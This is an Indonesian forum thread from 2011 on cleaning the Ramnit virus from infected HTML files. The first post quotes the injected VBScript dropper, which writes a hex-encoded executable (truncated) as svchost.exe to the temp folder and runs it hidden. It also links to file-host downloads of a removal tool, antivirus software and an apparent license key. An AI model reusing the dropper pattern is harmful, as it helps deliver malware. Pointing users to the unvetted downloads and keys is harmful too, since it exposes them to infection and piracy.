Mengatasi Virus Ramnit HTML Encrypted

Discussion in 'PC Software' started by omrapid, Mar 4, 2011.

  1. omrapid

    omrapid New Member

    Messages:
    12
    Likes Received:
    21
    Trophy Points:
    0
    Akhirnya setelah perjuangan siang dan malam....
    [​IMG]
    om tau ini virus disusupi dari blog/files2 html juga bisa melalui flash disk penyebarannya dan email.

    Bahayanya ini virus bisa beranak cucu kayak orang!!
    anti virus yang udah ditest smadav dan artav tak sanggup mengatasinya...

    klo pake kav dan avira waktu di scann, apunnn DJJJJJJ, ada seribu sampe dua ribu lebih file htm/html terinfeksi, plus file exe dan dll, bahkan script2 yang dicoding ikut terdeteksi, waktu saya klik "clean all" sialan lagi......siallll banget, file nya kehapus dan masuk folder quarantine, mati dah!!


    PHP:
    <SCRIPT language="VBScript"><! --
    DropFileName "svchost.exe"
    WriteData "4D5A90000300000004000000FFFF0000B8000000 // Kodenya terlalu panjang disini
    Set FSO = CreateObject("
    Scripting.FileSystemObject")
    DropPath = FSO.GetSpecialFolder(2) & "
    \" & DropFileName
    If FSO.FileExists(DropPath)=False Then
    Set FileObj = FSO.CreateTextFile(DropPath, True)
    For i = 1 To Len(WriteData) Step 2
    FileObj.Write Chr(CLng("
    &H" & Mid(WriteData,i,2)))
    Next FileObj.Close
    End If
    Set WSHshell = CreateObject("
    WScript.Shell")
    WSHshell.Run DropPath, 0 //
    --> 
    setelah browsing untuk mencari solusi, ( karena antivirus kaga bisa nolong malah nambahin masalah cz menghapus file-file penting ) saya menemukan file ini
    VBSDropperRemover.exe
    kalo broken link cari aja di sini atau nunggu saya bisa aplot ndiri dah.....
    aplikasi itu saya coba untuk membersihkan file yang terinfeksi tanpa menghapus file asli dan bener, berhasil, tapi ada syaratnya

    Aplication support : Windows XP/Vista/2000
    Java must be supported for Windows XP/Vista/2000/windows 7
    Ram dan disk space sistem menyesuaikan aja lah terserah asal jangan make floppy buat sistemnya

    1 Install Java terlebih dahulu
    atau ga mau pusink langsung ke tkp
    Code:
    http://4share.me/kdmg84
    http://maxspeedy.com/nqgad64f6z3r
    
    dan download file penghancur virus disini
    Code:
    http://4share.me/h6n5rb
    http://maxspeedy.com/4cxu3mhmmsq7
    
    2 Download file dan extract ke direktori mana aja deh yang ente suka

    3 Jalankan file nya


    Point 1 klik Choose root dir untuk memilih drive yang terinfeksi
    point 2 klik start untuk memulai pembersihan
    point 3 tunggu beberapa saat
    point 4 pada bagian cleaned akan muncul report "FATAL! Virus found.

    PHP:
    file C:\WINDOWS\system32\oobe\setup\security.htm is not infected.
    file C:\WINDOWS\system32\oobe\setup\timezone.htm is not infected.
    file C:\WINDOWS\system32\oobe\setup\username.htm is not infected.
    file C:\WINDOWS\system32\oobe\setup\welcome.htm is not infected.
    file C:\WINDOWS\system32\oobe\updshell.htm is not infected.
    file C:\WINDOWS\Web\tip.htm is not infected.
    Bagan diatas menandakan system html /htm sudah bersih tidak ada virus

    Kalo munculnya kayak gitu berarti file htm/html berhasil di bersihkan tanpa menghapusnya, yang di remove cuman kode VBS nya saja kok
    point 5 pada bagian failed itu adalah report gagal, saya ndak tau tulisanya gimana, karena saya berhasil membersihkan seluruh isi flasdisk saya, so, semoga ente gagal n mau bagi info ya seperti apa tulisan report di bagian failed

    5 mulai hancurkan semua kode VBS yang menginfeksi seluruh komputer anda

    6 perlu di ingat, yang dibersihkan hanya file berekstensi htm dan html jika file nya exe, kata si pemilik aplikasi sih antivirus tetaplah yang utama.

    7. Klo teman2 kaskus ada yang ingin memberikan masukan dan tambahan silahkan di share bersama agar komputer kita aman terus browse dan download

    8. Jangan lupa abis bersihkan semua download dan install ini anti virus buat bersihkan sampe ke sourcenya/sumbernya :
    Code:
    http://4share.me/wziyc6
    pake juga ini avira download
    Code:
    http://4share.me/ub1nak
    Lisensi keynya disini gan
    Code:
    http://4share.me/vibgbt

    Credits buat agan
    w3d0z


    Jangan lupa gan bantuin rate +5 yah... dan jika berkenan cendol...
     
    wongmanis, Lexandria, salsa and 3 others like this.
  2. ironman

    ironman New Member

    Messages:
    16
    Likes Received:
    1
    Trophy Points:
    0
    tak cobain dulu bosss,,, flashdisk ku kena,,, di formatpun gak mau hilang...
     
  3. Lexandria

    Lexandria New Member

    Messages:
    17
    Likes Received:
    14
    Trophy Points:
    0
  4. Tore3nt

    Tore3nt New Member

    Messages:
    1
    Likes Received:
    0
    Trophy Points:
    0
    pake ramnitkiller.exe aja
     
  5. dalban10

    dalban10 New Member

    Messages:
    124
    Likes Received:
    30
    Trophy Points:
    0
    eset nod v5.. Mantab om.. Bs mendeteksi virus tsb.
     

Share This Page